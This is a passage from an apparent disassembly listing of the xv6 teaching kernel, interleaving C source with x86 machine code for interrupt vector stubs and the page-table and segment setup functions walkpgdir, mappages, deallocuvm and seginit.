00 push $0x0 pushl $189 801064a5: 68 bd 00 00 00 push $0xbd jmp alltraps 801064aa: e9 ea f3 ff ff jmp 80105899 <alltraps> 801064af <vector190>: .globl vector190 vector190: pushl $0 801064af: 6a 00 push $0x0 pushl $190 801064b1: 68 be 00 00 00 push $0xbe jmp alltraps 801064b6: e9 de f3 ff ff jmp 80105899 <alltraps> 801064bb <vector191>: .globl vector191 vector191: pushl $0 801064bb: 6a 00 push $0x0 pushl $191 801064bd: 68 bf 00 00 00 push $0xbf jmp alltraps 801064c2: e9 d2 f3 ff ff jmp 80105899 <alltraps> 801064c7 <vector192>: .globl vector192 vector192: pushl $0 801064c7: 6a 00 push $0x0 pushl $192 801064c9: 68 c0 00 00 00 push $0xc0 jmp alltraps 801064ce: e9 c6 f3 ff ff jmp 80105899 <alltraps> 801064d3 <vector193>: .globl vector193 vector193: pushl $0 801064d3: 6a 00 push $0x0 pushl $193 801064d5: 68 c1 00 00 00 push $0xc1 jmp alltraps 801064da: e9 ba f3 ff ff jmp 80105899 <alltraps> 801064df <vector194>: .globl vector194 vector194: pushl $0 801064df: 6a 00 push $0x0 pushl $194 801064e1: 68 c2 00 00 00 push $0xc2 jmp alltraps 801064e6: e9 ae f3 ff ff jmp 80105899 <alltraps> 801064eb <vector195>: .globl vector195 vector195: pushl $0 801064eb: 6a 00 push $0x0 pushl $195 801064ed: 68 c3 00 00 00 push $0xc3 jmp alltraps 801064f2: e9 a2 f3 ff ff jmp 80105899 <alltraps> 801064f7 <vector196>: .globl vector196 vector196: pushl $0 801064f7: 6a 00 push $0x0 pushl $196 801064f9: 68 c4 00 00 00 push $0xc4 jmp alltraps 801064fe: e9 96 f3 ff ff jmp 80105899 <alltraps> 80106503 <vector197>: .globl vector197 vector197: pushl $0 80106503: 6a 00 push $0x0 pushl $197 80106505: 68 c5 00 00 00 push $0xc5 jmp alltraps 8010650a: e9 8a f3 ff ff jmp 80105899 <alltraps> 8010650f <vector198>: .globl vector198 vector198: pushl $0 8010650f: 6a 00 push $0x0 pushl $198 80106511: 68 c6 00 00 00 push $0xc6 jmp alltraps 80106516: e9 7e f3 ff ff jmp 80105899 <alltraps> 8010651b <vector199>: .globl vector199 vector199: pushl $0 8010651b: 6a 00 push $0x0 pushl $199 8010651d: 68 c7 00 00 00 push $0xc7 jmp alltraps 80106522: e9 72 f3 ff ff jmp 80105899 <alltraps> 80106527 <vector200>: .globl vector200 vector200: pushl $0 80106527: 6a 00 push $0x0 pushl $200 80106529: 68 c8 00 00 00 push $0xc8 jmp alltraps 8010652e: e9 66 f3 ff ff jmp 80105899 <alltraps> 80106533 <vector201>: .globl vector201 vector201: pushl $0 80106533: 6a 00 push $0x0 pushl $201 80106535: 68 c9 00 00 00 push $0xc9 jmp alltraps 8010653a: e9 5a f3 ff ff jmp 80105899 <alltraps> 8010653f <vector202>: .globl vector202 vector202: pushl $0 8010653f: 6a 00 push $0x0 pushl $202 80106541: 68 ca 00 00 00 push $0xca jmp alltraps 80106546: e9 4e f3 ff ff jmp 80105899 <alltraps> 8010654b <vector203>: .globl vector203 vector203: pushl $0 8010654b: 6a 00 push $0x0 pushl $203 8010654d: 68 cb 00 00 00 push $0xcb jmp alltraps 80106552: e9 42 f3 ff ff jmp 80105899 <alltraps> 80106557 <vector204>: .globl vector204 vector204: pushl $0 80106557: 6a 00 push $0x0 pushl $204 80106559: 68 cc 00 00 00 push $0xcc jmp alltraps 8010655e: e9 36 f3 ff ff jmp 80105899 <alltraps> 80106563 <vector205>: .globl vector205 vector205: pushl $0 80106563: 6a 00 push $0x0 pushl $205 80106565: 68 cd 00 00 00 push $0xcd jmp alltraps 8010656a: e9 2a f3 ff ff jmp 80105899 <alltraps> 8010656f <vector206>: .globl vector206 vector206: pushl $0 8010656f: 6a 00 push $0x0 pushl $206 80106571: 68 ce 00 00 00 push $0xce jmp alltraps 80106576: e9 1e f3 ff ff jmp 80105899 <alltraps> 8010657b <vector207>: .globl vector207 vector207: pushl $0 8010657b: 6a 00 push $0x0 pushl $207 8010657d: 68 cf 00 00 00 push $0xcf jmp alltraps 80106582: e9 12 f3 ff ff jmp 80105899 <alltraps> 80106587 <vector208>: .globl vector208 vector208: pushl $0 80106587: 6a 00 push $0x0 pushl $208 80106589: 68 d0 00 00 00 push $0xd0 jmp alltraps 8010658e: e9 06 f3 ff ff jmp 80105899 <alltraps> 80106593 <vector209>: .globl vector209 vector209: pushl $0 80106593: 6a 00 push $0x0 pushl $209 80106595: 68 d1 00 00 00 push $0xd1 jmp alltraps 8010659a: e9 fa f2 ff ff jmp 80105899 <alltraps> 8010659f <vector210>: .globl vector210 vector210: pushl $0 8010659f: 6a 00 push $0x0 pushl $210 801065a1: 68 d2 00 00 00 push $0xd2 jmp alltraps 801065a6: e9 ee f2 ff ff jmp 80105899 <alltraps> 801065ab <vector211>: .globl vector211 vector211: pushl $0 801065ab: 6a 00 push $0x0 pushl $211 801065ad: 68 d3 00 00 00 push $0xd3 jmp alltraps 801065b2: e9 e2 f2 ff ff jmp 80105899 <alltraps> 801065b7 <vector212>: .globl vector212 vector212: pushl $0 801065b7: 6a 00 push $0x0 pushl $212 801065b9: 68 d4 00 00 00 push $0xd4 jmp alltraps 801065be: e9 d6 f2 ff ff jmp 80105899 <alltraps> 801065c3 <vector213>: .globl vector213 vector213: pushl $0 801065c3: 6a 00 push $0x0 pushl $213 801065c5: 68 d5 00 00 00 push $0xd5 jmp alltraps 801065ca: e9 ca f2 ff ff jmp 80105899 <alltraps> 801065cf <vector214>: .globl vector214 vector214: pushl $0 801065cf: 6a 00 push $0x0 pushl $214 801065d1: 68 d6 00 00 00 push $0xd6 jmp alltraps 801065d6: e9 be f2 ff ff jmp 80105899 <alltraps> 801065db <vector215>: .globl vector215 vector215: pushl $0 801065db: 6a 00 push $0x0 pushl $215 801065dd: 68 d7 00 00 00 push $0xd7 jmp alltraps 801065e2: e9 b2 f2 ff ff jmp 80105899 <alltraps> 801065e7 <vector216>: .globl vector216 vector216: pushl $0 801065e7: 6a 00 push $0x0 pushl $216 801065e9: 68 d8 00 00 00 push $0xd8 jmp alltraps 801065ee: e9 a6 f2 ff ff jmp 80105899 <alltraps> 801065f3 <vector217>: .globl vector217 vector217: pushl $0 801065f3: 6a 00 push $0x0 pushl $217 801065f5: 68 d9 00 00 00 push $0xd9 jmp alltraps 801065fa: e9 9a f2 ff ff jmp 80105899 <alltraps> 801065ff <vector218>: .globl vector218 vector218: pushl $0 801065ff: 6a 00 push $0x0 pushl $218 80106601: 68 da 00 00 00 push $0xda jmp alltraps 80106606: e9 8e f2 ff ff jmp 80105899 <alltraps> 8010660b <vector219>: .globl vector219 vector219: pushl $0 8010660b: 6a 00 push $0x0 pushl $219 8010660d: 68 db 00 00 00 push $0xdb jmp alltraps 80106612: e9 82 f2 ff ff jmp 80105899 <alltraps> 80106617 <vector220>: .globl vector220 vector220: pushl $0 80106617: 6a 00 push $0x0 pushl $220 80106619: 68 dc 00 00 00 push $0xdc jmp alltraps 8010661e: e9 76 f2 ff ff jmp 80105899 <alltraps> 80106623 <vector221>: .globl vector221 vector221: pushl $0 80106623: 6a 00 push $0x0 pushl $221 80106625: 68 dd 00 00 00 push $0xdd jmp alltraps 8010662a: e9 6a f2 ff ff jmp 80105899 <alltraps> 8010662f <vector222>: .globl vector222 vector222: pushl $0 8010662f: 6a 00 push $0x0 pushl $222 80106631: 68 de 00 00 00 push $0xde jmp alltraps 80106636: e9 5e f2 ff ff jmp 80105899 <alltraps> 8010663b <vector223>: .globl vector223 vector223: pushl $0 8010663b: 6a 00 push $0x0 pushl $223 8010663d: 68 df 00 00 00 push $0xdf jmp alltraps 80106642: e9 52 f2 ff ff jmp 80105899 <alltraps> 80106647 <vector224>: .globl vector224 vector224: pushl $0 80106647: 6a 00 push $0x0 pushl $224 80106649: 68 e0 00 00 00 push $0xe0 jmp alltraps 8010664e: e9 46 f2 ff ff jmp 80105899 <alltraps> 80106653 <vector225>: .globl vector225 vector225: pushl $0 80106653: 6a 00 push $0x0 pushl $225 80106655: 68 e1 00 00 00 push $0xe1 jmp alltraps 8010665a: e9 3a f2 ff ff jmp 80105899 <alltraps> 8010665f <vector226>: .globl vector226 vector226: pushl $0 8010665f: 6a 00 push $0x0 pushl $226 80106661: 68 e2 00 00 00 push $0xe2 jmp alltraps 80106666: e9 2e f2 ff ff jmp 80105899 <alltraps> 8010666b <vector227>: .globl vector227 vector227: pushl $0 8010666b: 6a 00 push $0x0 pushl $227 8010666d: 68 e3 00 00 00 push $0xe3 jmp alltraps 80106672: e9 22 f2 ff ff jmp 80105899 <alltraps> 80106677 <vector228>: .globl vector228 vector228: pushl $0 80106677: 6a 00 push $0x0 pushl $228 80106679: 68 e4 00 00 00 push $0xe4 jmp alltraps 8010667e: e9 16 f2 ff ff jmp 80105899 <alltraps> 80106683 <vector229>: .globl vector229 vector229: pushl $0 80106683: 6a 00 push $0x0 pushl $229 80106685: 68 e5 00 00 00 push $0xe5 jmp alltraps 8010668a: e9 0a f2 ff ff jmp 80105899 <alltraps> 8010668f <vector230>: .globl vector230 vector230: pushl $0 8010668f: 6a 00 push $0x0 pushl $230 80106691: 68 e6 00 00 00 push $0xe6 jmp alltraps 80106696: e9 fe f1 ff ff jmp 80105899 <alltraps> 8010669b <vector231>: .globl vector231 vector231: pushl $0 8010669b: 6a 00 push $0x0 pushl $231 8010669d: 68 e7 00 00 00 push $0xe7 jmp alltraps 801066a2: e9 f2 f1 ff ff jmp 80105899 <alltraps> 801066a7 <vector232>: .globl vector232 vector232: pushl $0 801066a7: 6a 00 push $0x0 pushl $232 801066a9: 68 e8 00 00 00 push $0xe8 jmp alltraps 801066ae: e9 e6 f1 ff ff jmp 80105899 <alltraps> 801066b3 <vector233>: .globl vector233 vector233: pushl $0 801066b3: 6a 00 push $0x0 pushl $233 801066b5: 68 e9 00 00 00 push $0xe9 jmp alltraps 801066ba: e9 da f1 ff ff jmp 80105899 <alltraps> 801066bf <vector234>: .globl vector234 vector234: pushl $0 801066bf: 6a 00 push $0x0 pushl $234 801066c1: 68 ea 00 00 00 push $0xea jmp alltraps 801066c6: e9 ce f1 ff ff jmp 80105899 <alltraps> 801066cb <vector235>: .globl vector235 vector235: pushl $0 801066cb: 6a 00 push $0x0 pushl $235 801066cd: 68 eb 00 00 00 push $0xeb jmp alltraps 801066d2: e9 c2 f1 ff ff jmp 80105899 <alltraps> 801066d7 <vector236>: .globl vector236 vector236: pushl $0 801066d7: 6a 00 push $0x0 pushl $236 801066d9: 68 ec 00 00 00 push $0xec jmp alltraps 801066de: e9 b6 f1 ff ff jmp 80105899 <alltraps> 801066e3 <vector237>: .globl vector237 vector237: pushl $0 801066e3: 6a 00 push $0x0 pushl $237 801066e5: 68 ed 00 00 00 push $0xed jmp alltraps 801066ea: e9 aa f1 ff ff jmp 80105899 <alltraps> 801066ef <vector238>: .globl vector238 vector238: pushl $0 801066ef: 6a 00 push $0x0 pushl $238 801066f1: 68 ee 00 00 00 push $0xee jmp alltraps 801066f6: e9 9e f1 ff ff jmp 80105899 <alltraps> 801066fb <vector239>: .globl vector239 vector239: pushl $0 801066fb: 6a 00 push $0x0 pushl $239 801066fd: 68 ef 00 00 00 push $0xef jmp alltraps 80106702: e9 92 f1 ff ff jmp 80105899 <alltraps> 80106707 <vector240>: .globl vector240 vector240: pushl $0 80106707: 6a 00 push $0x0 pushl $240 80106709: 68 f0 00 00 00 push $0xf0 jmp alltraps 8010670e: e9 86 f1 ff ff jmp 80105899 <alltraps> 80106713 <vector241>: .globl vector241 vector241: pushl $0 80106713: 6a 00 push $0x0 pushl $241 80106715: 68 f1 00 00 00 push $0xf1 jmp alltraps 8010671a: e9 7a f1 ff ff jmp 80105899 <alltraps> 8010671f <vector242>: .globl vector242 vector242: pushl $0 8010671f: 6a 00 push $0x0 pushl $242 80106721: 68 f2 00 00 00 push $0xf2 jmp alltraps 80106726: e9 6e f1 ff ff jmp 80105899 <alltraps> 8010672b <vector243>: .globl vector243 vector243: pushl $0 8010672b: 6a 00 push $0x0 pushl $243 8010672d: 68 f3 00 00 00 push $0xf3 jmp alltraps 80106732: e9 62 f1 ff ff jmp 80105899 <alltraps> 80106737 <vector244>: .globl vector244 vector244: pushl $0 80106737: 6a 00 push $0x0 pushl $244 80106739: 68 f4 00 00 00 push $0xf4 jmp alltraps 8010673e: e9 56 f1 ff ff jmp 80105899 <alltraps> 80106743 <vector245>: .globl vector245 vector245: pushl $0 80106743: 6a 00 push $0x0 pushl $245 80106745: 68 f5 00 00 00 push $0xf5 jmp alltraps 8010674a: e9 4a f1 ff ff jmp 80105899 <alltraps> 8010674f <vector246>: .globl vector246 vector246: pushl $0 8010674f: 6a 00 push $0x0 pushl $246 80106751: 68 f6 00 00 00 push $0xf6 jmp alltraps 80106756: e9 3e f1 ff ff jmp 80105899 <alltraps> 8010675b <vector247>: .globl vector247 vector247: pushl $0 8010675b: 6a 00 push $0x0 pushl $247 8010675d: 68 f7 00 00 00 push $0xf7 jmp alltraps 80106762: e9 32 f1 ff ff jmp 80105899 <alltraps> 80106767 <vector248>: .globl vector248 vector248: pushl $0 80106767: 6a 00 push $0x0 pushl $248 80106769: 68 f8 00 00 00 push $0xf8 jmp alltraps 8010676e: e9 26 f1 ff ff jmp 80105899 <alltraps> 80106773 <vector249>: .globl vector249 vector249: pushl $0 80106773: 6a 00 push $0x0 pushl $249 80106775: 68 f9 00 00 00 push $0xf9 jmp alltraps 8010677a: e9 1a f1 ff ff jmp 80105899 <alltraps> 8010677f <vector250>: .globl vector250 vector250: pushl $0 8010677f: 6a 00 push $0x0 pushl $250 80106781: 68 fa 00 00 00 push $0xfa jmp alltraps 80106786: e9 0e f1 ff ff jmp 80105899 <alltraps> 8010678b <vector251>: .globl vector251 vector251: pushl $0 8010678b: 6a 00 push $0x0 pushl $251 8010678d: 68 fb 00 00 00 push $0xfb jmp alltraps 80106792: e9 02 f1 ff ff jmp 80105899 <alltraps> 80106797 <vector252>: .globl vector252 vector252: pushl $0 80106797: 6a 00 push $0x0 pushl $252 80106799: 68 fc 00 00 00 push $0xfc jmp alltraps 8010679e: e9 f6 f0 ff ff jmp 80105899 <alltraps> 801067a3 <vector253>: .globl vector253 vector253: pushl $0 801067a3: 6a 00 push $0x0 pushl $253 801067a5: 68 fd 00 00 00 push $0xfd jmp alltraps 801067aa: e9 ea f0 ff ff jmp 80105899 <alltraps> 801067af <vector254>: .globl vector254 vector254: pushl $0 801067af: 6a 00 push $0x0 pushl $254 801067b1: 68 fe 00 00 00 push $0xfe jmp alltraps 801067b6: e9 de f0 ff ff jmp 80105899 <alltraps> 801067bb <vector255>: .globl vector255 vector255: pushl $0 801067bb: 6a 00 push $0x0 pushl $255 801067bd: 68 ff 00 00 00 push $0xff jmp alltraps 801067c2: e9 d2 f0 ff ff jmp 80105899 <alltraps> 801067c7: 66 90 xchg %ax,%ax 801067c9: 66 90 xchg %ax,%ax 801067cb: 66 90 xchg %ax,%ax 801067cd: 66 90 xchg %ax,%ax 801067cf: 90 nop 801067d0 <walkpgdir>: // Return the address of the PTE in page table pgdir // that corresponds to virtual address va. If alloc!=0, // create any required page table pages. static pte_t * walkpgdir(pde_t *pgdir, const void *va, int alloc) { 801067d0: 55 push %ebp 801067d1: 89 e5 mov %esp,%ebp 801067d3: 57 push %edi 801067d4: 56 push %esi 801067d5: 53 push %ebx 801067d6: 89 d3 mov %edx,%ebx pde_t *pde; pte_t *pgtab; pde = &pgdir[PDX(va)]; 801067d8: c1 ea 16 shr $0x16,%edx 801067db: 8d 3c 90 lea (%eax,%edx,4),%edi // Return the address of the PTE in page table pgdir // that corresponds to virtual address va. If alloc!=0, // create any required page table pages. static pte_t * walkpgdir(pde_t *pgdir, const void *va, int alloc) { 801067de: 83 ec 0c sub $0xc,%esp pde_t *pde; pte_t *pgtab; pde = &pgdir[PDX(va)]; if(*pde & PTE_P){ 801067e1: 8b 07 mov (%edi),%eax 801067e3: a8 01 test $0x1,%al 801067e5: 74 29 je 80106810 <walkpgdir+0x40> pgtab = (pte_t*)P2V(PTE_ADDR(*pde)); 801067e7: 25 00 f0 ff ff and $0xfffff000,%eax 801067ec: 8d b0 00 00 00 80 lea -0x80000000(%eax),%esi // be further restricted by the permissions in the page table // entries, if necessary. *pde = V2P(pgtab) | PTE_P | PTE_W | PTE_U; } return &pgtab[PTX(va)]; } 801067f2: 8d 65 f4 lea -0xc(%ebp),%esp // The permissions here are overly generous, but they can // be further restricted by the permissions in the page table // entries, if necessary. *pde = V2P(pgtab) | PTE_P | PTE_W | PTE_U; } return &pgtab[PTX(va)]; 801067f5: c1 eb 0a shr $0xa,%ebx 801067f8: 81 e3 fc 0f 00 00 and $0xffc,%ebx 801067fe: 8d 04 1e lea (%esi,%ebx,1),%eax } 80106801: 5b pop %ebx 80106802: 5e pop %esi 80106803: 5f pop %edi 80106804: 5d pop %ebp 80106805: c3 ret 80106806: 8d 76 00 lea 0x0(%esi),%esi 80106809: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi pde = &pgdir[PDX(va)]; if(*pde & PTE_P){ pgtab = (pte_t*)P2V(PTE_ADDR(*pde)); } else { if(!alloc || (pgtab = (pte_t*)kalloc()) == 0) 80106810: 85 c9 test %ecx,%ecx 80106812: 74 2c je 80106840 <walkpgdir+0x70> 80106814: e8 77 bc ff ff call 80102490 <kalloc> 80106819: 85 c0 test %eax,%eax 8010681b: 89 c6 mov %eax,%esi 8010681d: 74 21 je 80106840 <walkpgdir+0x70> return 0; // Make sure all those PTE_P bits are zero. memset(pgtab, 0, PGSIZE); 8010681f: 83 ec 04 sub $0x4,%esp 80106822: 68 00 10 00 00 push $0x1000 80106827: 6a 00 push $0x0 80106829: 50 push %eax 8010682a: e8 61 de ff ff call 80104690 <memset> // The permissions here are overly generous, but they can // be further restricted by the permissions in the page table // entries, if necessary. *pde = V2P(pgtab) | PTE_P | PTE_W | PTE_U; 8010682f: 8d 86 00 00 00 80 lea -0x80000000(%esi),%eax 80106835: 83 c4 10 add $0x10,%esp 80106838: 83 c8 07 or $0x7,%eax 8010683b: 89 07 mov %eax,(%edi) 8010683d: eb b3 jmp 801067f2 <walkpgdir+0x22> 8010683f: 90 nop } return &pgtab[PTX(va)]; } 80106840: 8d 65 f4 lea -0xc(%ebp),%esp pde = &pgdir[PDX(va)]; if(*pde & PTE_P){ pgtab = (pte_t*)P2V(PTE_ADDR(*pde)); } else { if(!alloc || (pgtab = (pte_t*)kalloc()) == 0) return 0; 80106843: 31 c0 xor %eax,%eax // be further restricted by the permissions in the page table // entries, if necessary. *pde = V2P(pgtab) | PTE_P | PTE_W | PTE_U; } return &pgtab[PTX(va)]; } 80106845: 5b pop %ebx 80106846: 5e pop %esi 80106847: 5f pop %edi 80106848: 5d pop %ebp 80106849: c3 ret 8010684a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80106850 <mappages>: // Create PTEs for virtual addresses starting at va that refer to // physical addresses starting at pa. va and size might not // be page-aligned. static int mappages(pde_t *pgdir, void *va, uint size, uint pa, int perm) { 80106850: 55 push %ebp 80106851: 89 e5 mov %esp,%ebp 80106853: 57 push %edi 80106854: 56 push %esi 80106855: 53 push %ebx char *a, *last; pte_t *pte; a = (char*)PGROUNDDOWN((uint)va); 80106856: 89 d3 mov %edx,%ebx 80106858: 81 e3 00 f0 ff ff and $0xfffff000,%ebx // Create PTEs for virtual addresses starting at va that refer to // physical addresses starting at pa. va and size might not // be page-aligned. static int mappages(pde_t *pgdir, void *va, uint size, uint pa, int perm) { 8010685e: 83 ec 1c sub $0x1c,%esp 80106861: 89 45 e4 mov %eax,-0x1c(%ebp) char *a, *last; pte_t *pte; a = (char*)PGROUNDDOWN((uint)va); last = (char*)PGROUNDDOWN(((uint)va) + size - 1); 80106864: 8d 44 0a ff lea -0x1(%edx,%ecx,1),%eax 80106868: 8b 7d 08 mov 0x8(%ebp),%edi 8010686b: 25 00 f0 ff ff and $0xfffff000,%eax 80106870: 89 45 e0 mov %eax,-0x20(%ebp) for(;;){ if((pte = walkpgdir(pgdir, a, 1)) == 0) return -1; if(*pte & PTE_P) panic("remap"); *pte = pa | perm | PTE_P; 80106873: 8b 45 0c mov 0xc(%ebp),%eax 80106876: 29 df sub %ebx,%edi 80106878: 83 c8 01 or $0x1,%eax 8010687b: 89 45 dc mov %eax,-0x24(%ebp) 8010687e: eb 15 jmp 80106895 <mappages+0x45> a = (char*)PGROUNDDOWN((uint)va); last = (char*)PGROUNDDOWN(((uint)va) + size - 1); for(;;){ if((pte = walkpgdir(pgdir, a, 1)) == 0) return -1; if(*pte & PTE_P) 80106880: f6 00 01 testb $0x1,(%eax) 80106883: 75 45 jne 801068ca <mappages+0x7a> panic("remap"); *pte = pa | perm | PTE_P; 80106885: 0b 75 dc or -0x24(%ebp),%esi if(a == last) 80106888: 3b 5d e0 cmp -0x20(%ebp),%ebx for(;;){ if((pte = walkpgdir(pgdir, a, 1)) == 0) return -1; if(*pte & PTE_P) panic("remap"); *pte = pa | perm | PTE_P; 8010688b: 89 30 mov %esi,(%eax) if(a == last) 8010688d: 74 31 je 801068c0 <mappages+0x70> break; a += PGSIZE; 8010688f: 81 c3 00 10 00 00 add $0x1000,%ebx pte_t *pte; a = (char*)PGROUNDDOWN((uint)va); last = (char*)PGROUNDDOWN(((uint)va) + size - 1); for(;;){ if((pte = walkpgdir(pgdir, a, 1)) == 0) 80106895: 8b 45 e4 mov -0x1c(%ebp),%eax 80106898: b9 01 00 00 00 mov $0x1,%ecx 8010689d: 89 da mov %ebx,%edx 8010689f: 8d 34 3b lea (%ebx,%edi,1),%esi 801068a2: e8 29 ff ff ff call 801067d0 <walkpgdir> 801068a7: 85 c0 test %eax,%eax 801068a9: 75 d5 jne 80106880 <mappages+0x30> break; a += PGSIZE; pa += PGSIZE; } return 0; } 801068ab: 8d 65 f4 lea -0xc(%ebp),%esp a = (char*)PGROUNDDOWN((uint)va); last = (char*)PGROUNDDOWN(((uint)va) + size - 1); for(;;){ if((pte = walkpgdir(pgdir, a, 1)) == 0) return -1; 801068ae: b8 ff ff ff ff mov $0xffffffff,%eax break; a += PGSIZE; pa += PGSIZE; } return 0; } 801068b3: 5b pop %ebx 801068b4: 5e pop %esi 801068b5: 5f pop %edi 801068b6: 5d pop %ebp 801068b7: c3 ret 801068b8: 90 nop 801068b9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801068c0: 8d 65 f4 lea -0xc(%ebp),%esp if(a == last) break; a += PGSIZE; pa += PGSIZE; } return 0; 801068c3: 31 c0 xor %eax,%eax } 801068c5: 5b pop %ebx 801068c6: 5e pop %esi 801068c7: 5f pop %edi 801068c8: 5d pop %ebp 801068c9: c3 ret last = (char*)PGROUNDDOWN(((uint)va) + size - 1); for(;;){ if((pte = walkpgdir(pgdir, a, 1)) == 0) return -1; if(*pte & PTE_P) panic("remap"); 801068ca: 83 ec 0c sub $0xc,%esp 801068cd: 68 6c 7b 10 80 push $0x80107b6c 801068d2: e8 99 9a ff ff call 80100370 <panic> 801068d7: 89 f6 mov %esi,%esi 801068d9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801068e0 <deallocuvm.part.0>: // Deallocate user pages to bring the process size from oldsz to // newsz. oldsz and newsz need not be page-aligned, nor does newsz // need to be less than oldsz. oldsz can be larger than the actual // process size. Returns the new process size. int deallocuvm(pde_t *pgdir, uint oldsz, uint newsz) 801068e0: 55 push %ebp 801068e1: 89 e5 mov %esp,%ebp 801068e3: 57 push %edi 801068e4: 56 push %esi 801068e5: 53 push %ebx uint a, pa; if(newsz >= oldsz) return oldsz; a = PGROUNDUP(newsz); 801068e6: 8d 99 ff 0f 00 00 lea 0xfff(%ecx),%ebx // Deallocate user pages to bring the process size from oldsz to // newsz. oldsz and newsz need not be page-aligned, nor does newsz // need to be less than oldsz. oldsz can be larger than the actual // process size. Returns the new process size. int deallocuvm(pde_t *pgdir, uint oldsz, uint newsz) 801068ec: 89 c7 mov %eax,%edi uint a, pa; if(newsz >= oldsz) return oldsz; a = PGROUNDUP(newsz); 801068ee: 81 e3 00 f0 ff ff and $0xfffff000,%ebx // Deallocate user pages to bring the process size from oldsz to // newsz. oldsz and newsz need not be page-aligned, nor does newsz // need to be less than oldsz. oldsz can be larger than the actual // process size. Returns the new process size. int deallocuvm(pde_t *pgdir, uint oldsz, uint newsz) 801068f4: 83 ec 1c sub $0x1c,%esp 801068f7: 89 4d e0 mov %ecx,-0x20(%ebp) if(newsz >= oldsz) return oldsz; a = PGROUNDUP(newsz); for(; a < oldsz; a += PGSIZE){ 801068fa: 39 d3 cmp %edx,%ebx 801068fc: 73 66 jae 80106964 <deallocuvm.part.0+0x84> 801068fe: 89 d6 mov %edx,%esi 80106900: eb 3d jmp 8010693f <deallocuvm.part.0+0x5f> 80106902: 8d b6 00 00 00 00 lea 0x0(%esi),%esi pte = walkpgdir(pgdir, (char*)a, 0); if(!pte) a = PGADDR(PDX(a) + 1, 0, 0) - PGSIZE; else if((*pte & PTE_P) != 0){ 80106908: 8b 10 mov (%eax),%edx 8010690a: f6 c2 01 test $0x1,%dl 8010690d: 74 26 je 80106935 <deallocuvm.part.0+0x55> pa = PTE_ADDR(*pte); if(pa == 0) 8010690f: 81 e2 00 f0 ff ff and $0xfffff000,%edx 80106915: 74 58 je 8010696f <deallocuvm.part.0+0x8f> panic("kfree"); char *v = P2V(pa); kfree(v); 80106917: 83 ec 0c sub $0xc,%esp 8010691a: 81 c2 00 00 00 80 add $0x80000000,%edx 80106920: 89 45 e4 mov %eax,-0x1c(%ebp) 80106923: 52 push %edx 80106924: e8 b7 b9 ff ff call 801022e0 <kfree> *pte = 0; 80106929: 8b 45 e4 mov -0x1c(%ebp),%eax 8010692c: 83 c4 10 add $0x10,%esp 8010692f: c7 00 00 00 00 00 movl $0x0,(%eax) if(newsz >= oldsz) return oldsz; a = PGROUNDUP(newsz); for(; a < oldsz; a += PGSIZE){ 80106935: 81 c3 00 10 00 00 add $0x1000,%ebx 8010693b: 39 f3 cmp %esi,%ebx 8010693d: 73 25 jae 80106964 <deallocuvm.part.0+0x84> pte = walkpgdir(pgdir, (char*)a, 0); 8010693f: 31 c9 xor %ecx,%ecx 80106941: 89 da mov %ebx,%edx 80106943: 89 f8 mov %edi,%eax 80106945: e8 86 fe ff ff call 801067d0 <walkpgdir> if(!pte) 8010694a: 85 c0 test %eax,%eax 8010694c: 75 ba jne 80106908 <deallocuvm.part.0+0x28> a = PGADDR(PDX(a) + 1, 0, 0) - PGSIZE; 8010694e: 81 e3 00 00 c0 ff and $0xffc00000,%ebx 80106954: 81 c3 00 f0 3f 00 add $0x3ff000,%ebx if(newsz >= oldsz) return oldsz; a = PGROUNDUP(newsz); for(; a < oldsz; a += PGSIZE){ 8010695a: 81 c3 00 10 00 00 add $0x1000,%ebx 80106960: 39 f3 cmp %esi,%ebx 80106962: 72 db jb 8010693f <deallocuvm.part.0+0x5f> kfree(v); *pte = 0; } } return newsz; } 80106964: 8b 45 e0 mov -0x20(%ebp),%eax 80106967: 8d 65 f4 lea -0xc(%ebp),%esp 8010696a: 5b pop %ebx 8010696b: 5e pop %esi 8010696c: 5f pop %edi 8010696d: 5d pop %ebp 8010696e: c3 ret if(!pte) a = PGADDR(PDX(a) + 1, 0, 0) - PGSIZE; else if((*pte & PTE_P) != 0){ pa = PTE_ADDR(*pte); if(pa == 0) panic("kfree"); 8010696f: 83 ec 0c sub $0xc,%esp 80106972: 68 06 74 10 80 push $0x80107406 80106977: e8 f4 99 ff ff call 80100370 <panic> 8010697c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80106980 <seginit>: // Set up CPU's kernel segment descriptors. // Run once on entry on each CPU. void seginit(void) { 80106980: 55 push %ebp 80106981: 89 e5 mov %esp,%ebp 80106983: 83 ec 18 sub $0x18,%esp // Map "logical" addresses to virtual addresses using identity map. // Cannot share a CODE descriptor for both kernel and user // because it would have to have DPL_USR, but the CPU forbids // an interrupt from CPL=0 to DPL=3. c = &cpus[cpuid()]; 80106986: e8 d5 cd ff ff call 80103760 <cpuid> c->gdt[SEG_KCODE] = SEG(STA_X|STA_R, 0, 0xffffffff, 0); 8010698b: 69 c0 b0 00 00 00 imul $0xb0,%eax,%eax 80106991: 31 c9 xor %ecx,%ecx 80106993: ba ff ff ff ff mov $0xffffffff,%edx 80106998: 66 89 90 18 28 11 80 mov %dx,-0x7feed7e8(%eax) 8010699f: 66 89 88 1a 28 11 80 mov %cx,-0x7feed7e6(%eax) c->gdt[SEG_KDATA] = SEG(STA_W, 0, 0xffffffff, 0); 801069a6: ba ff ff ff ff mov $0xffffffff,%edx 801069ab: 31 c9 xor %ecx,%ecx 801069ad: 66 89 90 20 28 11 80 mov %dx,-0x7feed7e0(%eax) c->gdt[SEG_UCODE] = SEG(STA_X|STA_R, 0, 0xffffffff, DPL_USER); 801069b4: ba ff ff ff ff mov $0xffffffff,%edx // Cannot share a CODE descriptor for both kernel and user // because it would have to have DPL_USR, but the CPU forbids // an interrupt from CPL=0 to DPL=3. c = &cpus[cpuid()]; c->gdt[SEG_KCODE] = SEG(STA_X|STA_R, 0, 0xffffffff, 0); c->gdt[SEG_KDATA] = SEG(STA_W, 0, 0xffffffff, 0); 801069b9: 66 89 88 22 28 11 80 mov %cx,-0x7feed7de(%eax) c->gdt[SEG_UCODE] = SEG(STA_X|STA_R, 0, 0xffffffff, DPL_USER); 801069c0: 31 c9 xor %ecx,%ecx 801069c2: 66 89 90 28 28 11 80 mov %dx,-0x7feed7d8(%eax) 801069c9: 66 89 88 2a 28 11 80 mov %cx,-0x7feed7d6(%eax) c->gdt[SEG_UDATA] = 